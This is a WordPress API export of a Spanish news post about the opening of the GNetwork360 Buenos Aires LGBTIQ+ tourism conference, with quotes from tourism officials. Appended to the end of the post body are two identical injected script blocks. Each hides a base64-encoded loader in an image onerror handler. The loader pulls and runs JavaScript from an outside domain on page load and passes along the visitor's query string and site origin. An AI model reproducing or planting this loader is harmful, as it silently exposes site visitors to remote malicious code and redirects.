{"id":4368,"date":"2024-08-30T09:16:19","date_gmt":"2024-08-30T12:16:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4368"},"modified":"2025-08-13T23:49:30","modified_gmt":"2025-08-14T02:49:30","slug":"nueva-edicion-de-gnetwork360-buenos-aires","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4368","title":{"rendered":"Nueva edici\u00f3n de GNetwork360 Buenos Aires"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-cf01aedafcc28e723f6e5393d1b05cdd\" style=\"background-color:#a8065f\"><em>El evento de marketing y turismo LGBTIBQ+ m\u00e1s grande de Latinoam\u00e9rica reunir\u00e1 a medio centenar de expositores de dieciocho pa\u00edses durante tres jornadas.<\/em><\/h3>\n\n\n\n<p>La subsecretaria de Turismo, Yanina Mart\u00ednez, junto a Pablo de Luca, presidente de CCGLAR, particip\u00f3 hoy de la apertura de una&nbsp;<strong>nueva edici\u00f3n de GNetwork360 Buenos Aires<\/strong>, la Conferencia Internacional de Negocios y Turismo LGBTIQ+ que reunir\u00e1 a medio centenar de expositores de dieciocho pa\u00edses durante tres jornadas.<\/p>\n\n\n\n<p><strong>Yanina Mart\u00ednez<\/strong>&nbsp;destac\u00f3 el impacto positivo que generan estos encuentros en todos los destinos del pa\u00eds. Y agreg\u00f3 que: \u00ab<em>Esperamos poder seguir trabajando articuladamente, sector p\u00fablico y privado, para que el turismo siga creciendo en Argentina, y nos visitando turistas de&nbsp;todo&nbsp;el&nbsp;mundo<\/em>\u00ab.<\/p>\n\n\n\n<p>\u00ab<em>Esta edici\u00f3n contar\u00e1 75 profesionales que compartir\u00e1n sus experiencias y conocimiento durante las jornadas, y compradores de 7 pa\u00edses, que vinieron a trav\u00e9s de Visit Buenos Aires, para que los prestadores argentinos generen nuevos negocios y vendan nuestros destinos<\/em>\u00ab, se\u00f1al\u00f3&nbsp;<strong>Pablo&nbsp;de&nbsp;Luca<\/strong>, presidente de la C\u00e1mara de Comercio LGBT argentina.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/gnetwork_2024_3.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>M\u00e1s de&nbsp;<strong>1.800 visitantes<\/strong>&nbsp;asistir\u00e1n a las ponencias y la ronda de negocios de esta decimonovena edici\u00f3n \u2013convocada por la C\u00e1mara de Comercio LGBTIQ y la Secretar\u00eda de Turismo, Ambiente y Deportes de la Naci\u00f3n\u2013 que tendr\u00e1n lugar en el Alvear Icon, en tanto que el cierre se realizar\u00e1 en el Sheraton Buenos Aires.<\/p>\n\n\n\n<p>Entre otras actividades relacionadas con&nbsp;<strong>destinos tur\u00edsticos argentinos<\/strong>, la agenda del encuentro incluye las ponencias \u201cIguaz\u00fa y Neuqu\u00e9n: escenarios naturales para matrimonios igualitarios y escapada rom\u00e1nticas\u201d, \u201cRosario, ciudad diversa\u201d y \u201cBuenos Aires y la inclusi\u00f3n LGBTIQ+: proyectos y pol\u00edticas para una convivencia diversa\u201d.<\/p>\n\n\n\n<p>Esta edici\u00f3n de&nbsp;<strong>GNetwork360<\/strong>&nbsp;estar\u00e1 centrada en el&nbsp;<em>networking<\/em>&nbsp;y promover\u00e1 los encuentros presenciales m\u00e1s peque\u00f1os y personalizados entre vendedores y compradores de diferentes servicios, productos y destinos.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron presentes en la apertura el presidente de la C\u00e1mara Argentina de Turismo,&nbsp;<strong>Gustavo Hani<\/strong>; el presidente del Ente de Turismo de Buenos Aires,&nbsp;<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>; y el secretario General de CCGLAR,&nbsp;<strong>Gustavo Noguera<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/nueva-edicion-de-gnetwork360-buenos-aires\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:363px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El evento de marketing y turismo LGBTIBQ+ m\u00e1s grande de Latinoam\u00e9rica reunir\u00e1 a medio centenar de expositores de dieciocho pa\u00edses durante tres jornadas. La subsecretaria de Turismo, Yanina Mart\u00ednez, junto a Pablo de Luca, presidente de CCGLAR, particip\u00f3 hoy de la apertura de una&nbsp;nueva edici\u00f3n de GNetwork360 Buenos Aires, la Conferencia Internacional de Negocios y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4369,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-4368","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4368"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4368"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4368\/revisions"}],"predecessor-version":[{"id":6694,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4368\/revisions\/6694"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4369"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4368"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4368"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4368"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}